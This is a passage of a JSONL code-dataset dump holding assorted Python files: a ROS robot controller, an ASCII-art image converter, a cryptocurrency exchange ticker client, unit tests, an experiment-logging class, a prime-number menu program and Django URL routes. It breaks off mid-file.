NOTE: The gradient is normalized for this computation\nsub = active_subspaces.subspaces.Subspaces()\nsub.compute(df_norm/np.linalg.norm(df_norm, axis=1).reshape((M, 1)))\n\n# Rewrite the active/inactive subspace variables to be n-dimensional\nsub.W1, sub.W2 = sub.eigenvectors[:,:n], sub.eigenvectors[:,n:]\nsub.W1 = sub.W1.reshape(m, n)\nsub.W2 = sub.W2.reshape(m, m-n)\n\n# Define the active/inactive variables\nY, Z = np.dot(X_norm, sub.W1), np.dot(X_norm, sub.W2)\n\n# Plot the active subspace info\nactive_subspaces.utils.plotters.eigenvalues(sub.eigenvalues, e_br=sub.e_br, out_label='True')\nactive_subspaces.utils.plotters.eigenvectors(sub.W1, 
in_labels=in_labels, out_label='True')","sub_path":"active_subspaces/Matlab_Version/Python_Testing/Data_Set/test_script_gradients.py","file_name":"test_script_gradients.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316901245","text":"\nfrom datetime import datetime\nfrom diofant import latex\n\n\ndef output_results(prog, invariants, computation_time, output_format=\" \"):\n program_name = prog.name\n timestamp = datetime.now().strftime('%y%m%d-%H%M%S%f')[:-4]\n if output_format == \"tex\" or output_format == \"latex\":\n with open(f\"out/{output_format}_{program_name}_{timestamp}\",\"a+\") as f:\n for k in invariants:\n if k:\n f.write(\"\\[E[{}] = {}\\]\\n\".format(latex(k.as_expr()), latex(invariants[k])))\n f.write(\"\\nComputation time {}s.\".format(computation_time))\n f.write(\"\\n\\n\")\n elif output_format == \"text\" or output_format == \"eval\" or output_format == \"exp\":\n with open(f\"out/{output_format}_{program_name}_{timestamp}\",\"a+\") as f:\n for k in invariants:\n if k:\n f.write(f\"\\nE[{k.as_expr()}] = {invariants[k]}\")\n f.write(f\"\\n\\nComputation time {computation_time}s.\")\n f.write(\"\\n\\n\")\n for k in invariants:\n if k:\n print(\" E[{}] = {}\".format(k.as_expr(), invariants[k]))\n print(\"Computation time {}s.\".format(computation_time))\n return [\" E[{}] = {}\".format(k.as_expr(), invariants[k]) for k in invariants if k]\n","sub_path":"mora/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141218487","text":"from PIL import Image\r\nimport sys\r\nimport urllib.request\r\n#import urllib, cStringIO\r\nimport requests\r\n#im = Image.open(requests.get(url, stream=True).raw)\r\n\r\nASCII_CHARS = ['.',',',':',';','+','*','?','%','S','#','@']\r\n#ASCII_CHARS = ['..',',,','::',';;','++','**','??','%%','SS','##','@@']\r\nASCII_CHARS = ASCII_CHARS[::-1]\r\n\r\n\r\n'''\r\nmethod resize():\r\n - takes as parameters the image, and the final width\r\n - resizes the image into the final width while maintaining aspect ratio\r\n'''\r\ndef resize(image, new_width):\r\n (old_width, old_height) = image.size\r\n aspect_ratio = float(old_height)/float(old_width)\r\n new_height = int((aspect_ratio * new_width)/2)\r\n new_dim = (new_width, new_height)\r\n new_image = image.resize(new_dim)\r\n return new_image\r\n'''\r\nmethod grayscalify():\r\n - takes an image as a parameter\r\n - returns the grayscale version of image\r\n'''\r\ndef grayscalify(image):\r\n return image.convert('L')\r\n\r\n'''\r\nmethod modify():\r\n - replaces every pixel with a character whose intensity is similar\r\n'''\r\ndef modify(image, buckets=25):\r\n initial_pixels = list(image.getdata())\r\n new_pixels = [ASCII_CHARS[pixel_value//buckets] for pixel_value in initial_pixels]\r\n return ''.join(new_pixels)\r\n\r\n'''\r\nmethod do():\r\n - does all the work by calling all the above functions\r\n'''\r\ndef do(image, new_width):\r\n image = resize(image,new_width)\r\n image = grayscalify(image)\r\n\r\n pixels = modify(image)\r\n len_pixels = len(pixels)\r\n\r\n # Construct the image from the character list\r\n new_image = [pixels[index:index+new_width] for index in range(0, len_pixels, new_width)]\r\n\r\n return '\\n'.join(new_image)\r\n\r\n'''\r\nmethod runner():\r\n - takes as parameter the image path and runs the above code\r\n - handles exceptions as well\r\n - provides 
alternative output options\r\n'''\r\ndef Asciify(path,newSize):\r\n image = None\r\n IMG=None\r\n try:\r\n image = Image.open(path)\r\n except:\r\n try:\r\n urllib.request.urlretrieve(path, 'a.'+path[-3:])\r\n image = Image.open('a.png')\r\n except:\r\n try:\r\n image = Image.open(requests.get(path, stream=True).raw)\r\n except:\r\n print(\"Unable to find image in\",path)\r\n #print(e)\r\n return\r\n image = do(image,newSize)\r\n return(image)\r\n\r\n\r\n\r\ndef asciify(path,newSize):\r\n IMG=None\r\n image = None\r\n try:\r\n image = Image.open(path)\r\n except:\r\n try:\r\n urllib.request.urlretrieve(path, 'a.'+path[-3:])\r\n image = Image.open('a.png')\r\n except:\r\n try:\r\n image = Image.open(requests.get(path, stream=True).raw)\r\n except:\r\n print(\"Unable to find image in\",path)\r\n #print(e)\r\n return\r\n image = do(image,newSize)\r\n print(image)\r\ndef Version():\r\n return('Current-2021-07-28')\r\n","sub_path":"asciify.py","file_name":"asciify.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56882268","text":"# Uses python3\nimport sys\nfrom collections import namedtuple\nimport operator\n\nSegment = namedtuple('Segment', 'start end')\n\ndef optimal_points(segments):\n points = []\n full_segments = []\n #write your code here\n segments.sort(key=operator.itemgetter(0))\n\n '''\n for s in segments:\n sub_segment = []\n value = s.start\n while value <= s.end:\n sub_segment.append(value)\n value += 1\n full_segments.append(sub_segment)\n\n full_segments.sort(key=operator.itemgetter(0))\n \n '''\n\n header = []\n hdr_header = []\n for cur, nxt in zip(segments, segments[1:]):\n # check common elements still connect segments. If not choose one and store\n if not header:\n for elem in cur:\n if elem in nxt:\n header.append(elem)\n if not header:\n points.append(max(cur))\n\n else:\n for h in header:\n if h in nxt:\n hdr_header.append(h)\n\n if hdr_header:\n header = hdr_header[:]\n hdr_header = []\n else:\n points.append(max(header))\n header = []\n\n # get common elements cur and next, store in header\n # process last segment\n if header:\n # last link\n points.append(max(header))\n else:\n # no link, last segment on its own\n points.append(max(nxt))\n\n #points.sort()\n\n return points\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *data = map(int, input.split())\n segments = list(map(lambda x: Segment(x[0], x[1]), zip(data[::2], data[1::2])))\n points = optimal_points(segments)\n print(len(points))\n for p in points:\n print(p, end=' ')\n\n# 3 1 3 2 5 3 6 = 1 3\n# 4 4 7 1 3 2 5 5 6 = 2 3 6\n\n#\n\n# = 43\n# 1 4 5 8 9 10 14 15 18 23 26 28 29 30 32 34 35 36 40 41 44 46 49 52 54 56 58 61 62 63 65 67 70 74 77 78 79 81 84 87 91 93 95\n# 1 4 8 10 14 18 23 26 29 32 34 35 36 40 41 44 49 52 54 58 63 65 67 70 74 78 79 81 84 87 91 93\n#M\n# 1 2 4 8 10 14 15 18 23 26 27 29 32 33 34 35 36 38 40 41 42 44 49 51 52 54 58 63 64 65 67 70 74 78 79 81 82 84 87 91 93\n#https://rosettacode.org/wiki/Largest_int_from_concatenated_ints#Python:_Sort_on_comparison_of_concatenated_ints_method","sub_path":"week3_greedy_algorithms/4_collecting_signatures/covering_segments3.py","file_name":"covering_segments3.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529839601","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom tf2_geometry_msgs import 
Vector3Stamped\nfrom geometry_msgs.msg import TransformStamped\nfrom std_msgs.msg import Float64\nimport tf2_ros\nimport tf_conversions\n\n'''\nLateral input: x and y in \"absolute\" (IMU) frame\nRotational input: IMU frame degrees\nThis needs to be transformed into \"robot\" frame (X is forward)\nAt each timestep:\n Rotate input x/y into robot frame\n Publish:\n linear:\n x: rotated input\n y: rotated input\n z: PID output with input setpoint (no transformation)\n angular\n x: 0\n y: 0\n z: PID output with input setpoint (no transformation)\nQuestions for Ore:\n - Absolute vs. Relative\n - Mutex on goal pose publisher?\n - tf transformations\n \n'''\n\n\nclass Controller:\n twist_state = Twist()\n yaw_control_out = 0.0\n depth_control_out = 0.0\n\n yaw = 0.0\n max_lateral_speed = 0.4\n world_goal = None\n\n def goal_callback(self, twist: Twist):\n self.depth_set_pub.publish(twist.linear.z)\n self.yaw_set_pub.publish(twist.angular.z)\n self.world_goal = Vector3Stamped()\n self.world_goal.vector.x = twist.linear.x\n self.world_goal.vector.y = twist.linear.y\n self.world_goal.header.frame_id = \"map\"\n\n def depth_control_callback(self, controller_output: Float64):\n self.depth_control_out = controller_output.data\n\n def yaw_control_callback(self, controller_output: Float64):\n self.yaw_control_out = controller_output.data\n\n def __init__(self):\n rospy.init_node('controller', anonymous=False)\n rate = rospy.Rate(20)\n\n rospy.Subscriber(\"wolf_control/goal\", Twist, self.goal_callback)\n rospy.Subscriber(\"wolf_control/yaw_output\", Float64, self.yaw_control_callback)\n rospy.Subscriber(\"wolf_control/depth_output\", Float64, self.depth_control_callback)\n\n\n self.yaw_set_pub = rospy.Publisher(\"wolf_control/yaw_setpoint\", Float64, queue_size=10)\n self.depth_set_pub = rospy.Publisher(\"wolf_control/depth_setpoint\", Float64, queue_size=10)\n self.yaw_state_pub = rospy.Publisher(\"wolf_control/yaw_state\", Float64, queue_size=10)\n self.depth_state_pub = rospy.Publisher(\"wolf_control/depth_state\", Float64, queue_size=10)\n self.vel_pub = rospy.Publisher(\"cmd_vel\", Twist, queue_size=10)\n\n tf_buffer = tf2_ros.Buffer()\n listener = tf2_ros.TransformListener(tf_buffer)\n\n while not rospy.is_shutdown():\n\n #get the current robot position and give the appropriate pieces to the PID controllers\n try:\n odom = tf_buffer.lookup_transform(\"map\", \"odom\", rospy.Time(0))\n\n #publish yaw & depth\n rot = (odom.transform.rotation.x, odom.transform.rotation.y, odom.transform.rotation.z, odom.transform.rotation.w)\n self.yaw_state_pub.publish(tf_conversions.transformations.euler_from_quaternion(rot)[2]) \n self.depth_state_pub.publish(odom.transform.translation.z)\n\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n print(\"failed to get transform\")\n pass\n\n #set thrusters to move according to movement controllers\n cmd_vel = Twist()\n cmd_vel.linear.z = self.depth_control_out\n cmd_vel.angular.z = self.yaw_control_out\n \n if self.world_goal:\n try:\n hull_goal = tf_buffer.transform(self.world_goal, 'odom')\n cmd_vel.linear.x = hull_goal.vector.x\n cmd_vel.linear.y = hull_goal.vector.y\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n pass\n\n self.vel_pub.publish(cmd_vel)\n rate.sleep()\n\n\nif __name__ == '__main__':\n controller = 
Controller()\n","sub_path":"wolf_control/scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454485637","text":"import utils\nimport unittest\nimport numpy as np\nimport pandas as pd\nimport math\n\nclass TestUtils(unittest.TestCase):\n\n #example test for test's workflow purposes\n def test_segment_parsion(self):\n self.assertTrue(True)\n \n def test_confidence_all_normal_value(self):\n segment = [1, 2, 0, 6, 8, 5, 3]\n utils_result = utils.find_confidence(segment)\n result = 1.6\n relative_tolerance = 1e-2\n self.assertTrue(math.isclose(utils_result, result, rel_tol = relative_tolerance))\n \n def test_confidence_all_nan_value(self):\n segment = [np.NaN, np.NaN, np.NaN, np.NaN]\n self.assertEqual(utils.find_confidence(segment), 0)\n \n def test_confidence_with_nan_value(self):\n data = [np.NaN, np.NaN, 0, 8]\n utils_result = utils.find_confidence(data)\n result = 1.6\n relative_tolerance = 1e-2\n self.assertTrue(math.isclose(utils_result, result, rel_tol = relative_tolerance))\n \n def test_interval_all_normal_value(self):\n data = [1, 2, 1, 2, 4, 1, 2, 4, 5, 6]\n data = pd.Series(data)\n center = 4\n window_size = 2\n result = [1, 2, 4, 1, 2]\n self.assertEqual(list(utils.get_interval(data, center, window_size)), result)\n \n def test_interval_wrong_ws(self):\n data = [1, 2, 4, 1, 2, 4]\n data = pd.Series(data)\n center = 3\n window_size = 6\n result = [1, 2, 4, 1, 2, 4]\n self.assertEqual(list(utils.get_interval(data, center, window_size)), result)\n \n def test_subtract_min_without_nan(self):\n segment = [1, 2, 4, 1, 2, 4] \n segment = pd.Series(segment)\n result = [0, 1, 3, 0, 1, 3]\n utils_result = list(utils.subtract_min_without_nan(segment))\n self.assertEqual(utils_result, result)\n \n def test_subtract_min_with_nan(self):\n segment = [np.NaN, 2, 4, 1, 2, 4]\n segment = pd.Series(segment)\n result = [2, 4, 1, 2, 4]\n utils_result = list(utils.subtract_min_without_nan(segment)[1:])\n self.assertEqual(utils_result, result)\n \n def test_get_convolve(self):\n data = [1, 2, 3, 2, 2, 0, 2, 3, 4, 3, 2, 1, 1, 2, 3, 4, 3, 2, 0]\n data = pd.Series(data)\n pattern_index = [2, 8, 15]\n window_size = 2\n av_model = [1, 2, 3, 2, 1]\n result = []\n self.assertNotEqual(utils.get_convolve(pattern_index, av_model, data, window_size), result)\n \n def test_get_convolve_with_nan(self):\n data = [1, 2, 3, 2, np.NaN, 0, 2, 3, 4, np.NaN, 2, 1, 1, 2, 3, 4, 3, np.NaN, 0]\n data = pd.Series(data)\n pattern_index = [2, 8, 15]\n window_size = 2\n av_model = [1, 2, 3, 2, 1]\n result = utils.get_convolve(pattern_index, av_model, data, window_size)\n for val in result:\n self.assertFalse(np.isnan(val))\n \n def test_get_convolve_empty_data(self):\n data = []\n pattern_index = []\n window_size = 2\n av_model = []\n result = []\n self.assertEqual(utils.get_convolve(pattern_index, av_model, data, window_size), result)\n \n def test_get_distribution_density(self):\n segment = [1, 1, 1, 3, 5, 5, 5]\n segment = pd.Series(segment)\n result = (3, 5, 1)\n self.assertEqual(utils.get_distribution_density(segment), result)\n \n def test_find_jump_parameters_center(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_center = [10, 11]\n self.assertIn(utils.find_jump_parameters(segment, 0)[0], jump_center)\n \n def test_find_jump_parameters_height(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 
1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_height = [3.5, 4]\n self.assertGreaterEqual(utils.find_jump_parameters(segment, 0)[1], jump_height[0])\n self.assertLessEqual(utils.find_jump_parameters(segment, 0)[1], jump_height[1])\n \n def test_find_jump_parameters_length(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_length = 2\n self.assertEqual(utils.find_jump_parameters(segment, 0)[2], jump_length)\n \n def test_find_drop_parameters_center(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_center = [14, 15]\n self.assertIn(utils.find_drop_parameters(segment, 0)[0], drop_center)\n \n def test_find_drop_parameters_height(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_height = [3.5, 4]\n self.assertGreaterEqual(utils.find_drop_parameters(segment, 0)[1], drop_height[0])\n self.assertLessEqual(utils.find_drop_parameters(segment, 0)[1], drop_height[1])\n \n def test_find_drop_parameters_length(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_length = 2\n self.assertEqual(utils.find_drop_parameters(segment, 0)[2], drop_length)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"analytics/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57778712","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport git\nimport logging\n\nINDEPENDENT_DATA=\"independent_data\"\nDEPENDENT_DATA=\"dependent_data\"\n\nclass Trial:\n __name = \"\"\n __trials_dir = \"\"\n __trial_dir = \"\"\n __logfile = \"\"\n __description = \"\"\n __data = {}\n __cv_fn = None\n __solve_model = None\n __solution = None\n __eval_metrics = None\n\n def __init__(self, name, description, trials_dir = \"trials/\"):\n self.__start_time = datetime.now()\n self.__name = name\n self.__description = description\n self.__trials_dir = trials_dir\n self.__trial_dir = self.__trials_dir + name + \"/\" + self.get_start_time_str() + \"/\"\n self.__data_dir = self.__trial_dir + \"data/\"\n self.__logfile = self.__trial_dir + name + \".log\"\n\n self.create_trial_dir()\n self.remove_log_file()\n\n # hack to work around the fact that qtconsole adds a handler to the root logger when running script from within Spyder\n # taken from here: https://stackoverflow.com/questions/24259952/logging-module-does-not-print-in-ipython\n root = logging.getLogger()\n for handler in root.handlers[:]:\n root.removeHandler(handler)\n logging.basicConfig(filename = self.__logfile, level = logging.INFO, format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S' )\n\n self.log_info(\"Trial: \" + self.__name)\n self.log_info(\"Description: \" + self.__description)\n self.log_most_recent_commits()\n\n def get_start_time_str(self):\n return self.__start_time.strftime(\"%Y%m%d_%H%M%S\")\n\n # finds the root of this git repository that the supplied path is in\n # helper function to log_most_recent_commits()\n # taken from: https://stackoverflow.com/questions/22081209/find-the-root-of-the-git-repository-where-the-file-lives\n def get_git_root(self, path):\n git_repo = 
git.Repo(path, search_parent_directories=True)\n git_root = git_repo.git.rev_parse(\"--show-toplevel\")\n return git_root\n\n # formats commit info for logging\n # helper function to log_most_recent_commits()\n def format_commit_info(self, commit):\n commit_hash = commit[1]\n commit_ts_str = str(commit[3][0])\n commit_tz_str = str(commit[3][1])\n commit_msg = commit[4]\n return \" \".join([commit_hash, commit_ts_str, commit_tz_str, commit_msg])\n\n # function to log the most recent commits in the repository, for better reproducibility of the result\n def log_most_recent_commits(self, num_commits = 3):\n git_root = self.get_git_root(\".\")\n repo = git.Repo(git_root)\n cur_branch_name = repo.active_branch.name\n cur_branch_log = repo.active_branch.log()\n total_commits = len(cur_branch_log)\n commits_to_log = cur_branch_log[(total_commits - num_commits):]\n commits_to_log.reverse() # print most recent commit first, like git does\n\n logging.info(\"::::: Git repository info :::::\")\n logging.info(\"\")\n logging.info(\"Current branch: \" + cur_branch_name)\n logging.info(\"\")\n logging.info(\"Latest commits (most recent commit first):\")\n logging.info(\"\")\n for commit in commits_to_log:\n logging.info(self.format_commit_info(commit))\n\n logging.info(\"\")\n\n # function that is accessible from outside the class, to enable client scripts to log arbitrary information\n def log_info(self, msg):\n if type(msg) == list:\n for line in msg:\n logging.info(line)\n else:\n logging.info(msg)\n logging.info(\"\")\n\n # if parent directory doesn't exist, create it\n def create_trial_dir(self):\n if not os.path.exists(self.__trial_dir):\n os.makedirs(self.__trial_dir)\n\n def create_data_dir(self):\n if not os.path.exists(self.__data_dir):\n os.makedirs(self.__data_dir)\n\n def get_trial_dir(self):\n return self.__trial_dir\n\n def get_name(self):\n return self.__name\n\n def remove_log_file(self):\n if os.path.exists(self.__logfile):\n os.remove(self.__logfile)\n\n def conclude_trial(self):\n self.create_data_dir()\n for key, value in self.__data.iteritems():\n self.save_data_item(value, key)\n\n self.save_eval_metrics()\n self.save_solution()\n self.__plot_soln_fn(self.__solution)\n\n def get_logfile(self):\n return self.__logfile\n\n def set_description(self, description):\n self.__description = description\n\n def set_independent_data(self, A):\n self.__data[INDEPENDENT_DATA] = A\n\n def set_dependent_data(self, b):\n self.__data[DEPENDENT_DATA] = b\n\n def get_independent_data(self):\n return self.__data[INDEPENDENT_DATA]\n\n def get_dependent_data(self):\n return self.__data[DEPENDENT_DATA]\n\n def set_cv_fn(self, fn):\n self.__cv_fn = fn\n\n def set_solution_fn(self, fn):\n self.__solve_model = fn\n\n def set_plot_solution_fn(self, fn):\n self.__plot_soln_fn = fn\n\n def save_data_item(self, data_item, name):\n filename = self.__data_dir + name + \".csv\"\n if isinstance(data_item, np.ndarray):\n np.savetxt(filename, data_item)\n elif isinstance(data_item, pd.DataFrame):\n data_item.to_csv(filename)\n\n def save_eval_metrics(self):\n filename = self.__trial_dir + self.__name + \"_eval_metrics.csv\"\n if isinstance(self.__eval_metrics, np.ndarray):\n np.savetxt(filename, self.__eval_metrics)\n elif isinstance(self.__eval_metrics, pd.DataFrame):\n self.__eval_metrics.to_csv(filename, float_format='%.2f')\n\n def save_solution(self):\n filename = self.__trial_dir + self.__name + \"_solution.csv\"\n if isinstance(self.__solution, np.ndarray):\n np.savetxt(filename, self.__solution)\n elif 
isinstance(self.__solution, pd.DataFrame):\n self.__solution.to_csv(filename, float_format='%.2f')\n\n def run(self):\n eval_metrics = self.__cv_fn(self.get_independent_data(), self.get_dependent_data())\n self.__eval_metrics = eval_metrics\n self.__solution = self.__solve_model(self.get_independent_data(), self.get_dependent_data())\n self.conclude_trial()\n","sub_path":"trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"242187938","text":"def get_largest_prime_below(n):\n '''\n Găsește ultimul număr prim mai mic decât un număr dat.\n :param n: un numar natural\n :return: ultimul numar prim mai mic decat numarul dat\n '''\n if n<=2:\n return (\"Nu exista un astfel de numar\")\n else:\n for i in range(n - 1, 1, -1):\n verify = 1\n j = 2\n while j * j <= i and verify == 1:\n if i % j == 0:\n verify = 0\n else:\n j = j + 1\n if verify == 1:\n return i\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(2)==\"Nu exista un astfel de numar\"\n assert get_largest_prime_below(5)==3\n assert get_largest_prime_below(999)==997\n assert get_largest_prime_below(21)==19\n\ndef is_superprime(n):\n '''\n Determină dacă un număr este superprim: dacă toate prefixele sale sunt prime. De exemplu, 233 este superprim,\ndeoarece 2, 23 și 233 sunt toate prime, dar 237 nu este superprim, deoarece 237 nu este prim\n :param n: un numar natural\n :return: True|False\n '''\n if n<2 :\n return False\n while n :\n if n < 2 :\n return False\n i=2\n while i*i <= n:\n if n%i==0:\n return False\n i=i+1\n n=n//10\n return True\n\ndef test_is_superprime():\n assert is_superprime(2)==1\n assert is_superprime(23)==1\n assert is_superprime(233)==1\n assert is_superprime(237)==0\n\ndef is_palindrome(n) :\n '''\n Verifica daca un numar este palindrom\n :param n: numar narural\n :return: True|False\n '''\n nr=0\n n2=n\n while n :\n nr=nr*10 + n%10\n n=n//10\n if nr==n2 :\n return 1\n else: return 0\n\ndef test_is_palindrome():\n assert is_palindrome(77)==1\n assert is_palindrome(21)==0\n\n\ndef main ():\n while True:\n print(\"Alege o optune de mai jos: \")\n print(\"1. Găsește ultimul număr prim mai mic decât un număr dat. \")\n print(\"2. Determină dacă un număr este superprim. \")\n print(\"3. Verifica daca un numar este palindrom\")\n print(\"4. Iesire\")\n\n optiune=int(input(\"Dati optiunea \"))\n\n if optiune==1:\n opt1=1\n test_get_largest_prime_below()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt1==1 :\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = get_largest_prime_below(numar)\n print(\"Rezultatul este \" + str(afisare))\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt1=int(input())\n while opt1>2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt1 = int(input())\n elif optiune==2:\n opt2=1\n test_is_superprime()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt2==1 :\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = is_superprime(numar)\n if afisare :\n print(\"Numarul este superprim \")\n else:\n print(\"Numarul nu este superprim \")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. 
Pentru a te intoarce la meniu \")\n opt2=int(input())\n while opt2>2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt2 = int(input())\n elif optiune ==3:\n opt3 = 1\n test_is_palindrome()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt3 == 1:\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = is_palindrome(numar)\n if afisare:\n print(\"Numarul este palindrom\")\n else:\n print(\"Numarul nu este palindrom \")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt3 = int(input())\n while opt3 > 2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt3 = int(input())\n\n\n elif optiune==4 :\n break\n else :\n print(\"Optiune gresita. \")\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497591055","text":"from django.urls import path\n\nfrom projects import views\nfrom projects.views import ProjectsListView, ProjectDetailsView, ProjectCreateView, MoreProjectDetailsView, \\\n FullScreenView, EditView, DeleteView, EditMoreProjectDetailsView, DeleteProjectDetailsView, AboutView, \\\n MyProjectsListView\n\nurlpatterns = [\n path('', ProjectsListView.as_view(), name='index'),\n path('/', MyProjectsListView.as_view(), name='my_projects'),\n path('details//', ProjectDetailsView.as_view(), name='details'),\n path('create/', ProjectCreateView.as_view(), name='create'),\n path('add_more_details//', views.project_create_form_view, name='add_more_details'),\n path('all_project_details//', MoreProjectDetailsView.as_view(), name='all_project_details'),\n path('full_screen//', FullScreenView.as_view(), name='full_screen'),\n path('update_project//', EditView.as_view(), name='update_project'),\n path('delete//', DeleteView.as_view(), name='delete'),\n path('update_moredetails//', EditMoreProjectDetailsView.as_view(), name='update_moredetails'),\n path('delete_project_details//', DeleteProjectDetailsView.as_view(), name='delete_project_details'),\n path('/about/', AboutView.as_view(), name='about'),\n]","sub_path":"architects/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392523603","text":"\"\"\"\nAPI for Ethex (ethex.market)\n\nhttps://api.ethex.market:5055/ticker24\n\ndata = \n{\n \"ETH_BAT\": {\n \"last\": null,\n \"lowestAsk\": \"0.00131868\",\n \"highestBid\": \"0.001014\",\n \"volume\": \"0\",\n \"high24hr\": null,\n \"low24hr\": null\n },\n \"ETH_DAI\": {\n \"last\": null,\n \"lowestAsk\": \"0.00494096\",\n \"highestBid\": \"0.004627456\",\n \"volume\": \"0\",\n \"high24hr\": null,\n \"low24hr\": null\n },\n ...\n\"\"\"\nimport time\nimport logging\nimport socket\ntry:\n from urllib.request import urlopen, Request\nexcept:\n from urllib import urlopen, Request\n\nfrom urllib.error import URLError\n\nimport json\n\nimport pprint\n\nfrom weighted_average import WeightedAverage\n\n\nclass EthexAPI():\n def __init__(self, currency_symbol=\"0xBTC\"):\n self._SERVER_URL = \"https://api.ethex.market:5055\"\n self.currency_symbol = currency_symbol\n 
self.api_name = \"Ethex\"\n self.short_url = \"https://bit.ly/2SrmIl6\"\n self.last_updated_time = 0\n self.price_eth = None\n self.price_usd = None\n self.price_btc = None\n self.volume_usd = None\n self.volume_eth = None\n self.volume_btc = None\n self.change_24h = None\n self.eth_price_usd = None\n self.btc_price_usd = None\n\n def _update(self, timeout=10.0):\n method = \"/ticker24\"\n\n req = Request(\n self._SERVER_URL+method, \n data=None, \n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n response = urlopen(req, timeout=timeout)\n response = response.read().decode(\"utf-8\") \n try:\n data = json.loads(response)\n except json.decoder.JSONDecodeError:\n if \"be right back\" in response:\n raise TimeoutError(\"api is down - got 404 page\")\n else:\n \traise TimeoutError(\"api sent bad data ({})\".format(repr(response)))\n\n for pair_name in data:\n base_pair, currency = pair_name.split('_')\n # skip reverse-pairings\n if currency != self.currency_symbol:\n continue\n\n try:\n if base_pair == \"BTC\":\n self.price_btc = float(data[pair_name]['last'])\n self.volume_btc = float(data[pair_name]['volume'])\n if base_pair == \"ETH\":\n self.price_eth = float(data[pair_name]['last'])\n self.volume_eth = float(data[pair_name]['volume'])\n except TypeError as e:\n raise TimeoutError(\"Could not convert data to float\") from e\n\n if self.currency_symbol == \"ETH\":\n self.price_eth = 1\n self.eth_price_usd = self.price_usd\n if self.currency_symbol == \"BTC\":\n self.price_btc = 1\n self.btc_price_usd = self.price_usd\n\n def update(self, timeout=10.0):\n try:\n self._update(timeout=timeout)\n except (TimeoutError,\n ConnectionResetError,\n ConnectionRefusedError,\n socket.timeout,\n socket.gaierror,\n URLError) as e:\n logging.warning('api timeout {}: {}'.format(self.api_name, str(e)))\n else:\n self.last_updated_time = time.time()\n\n def print_all_values(self):\n 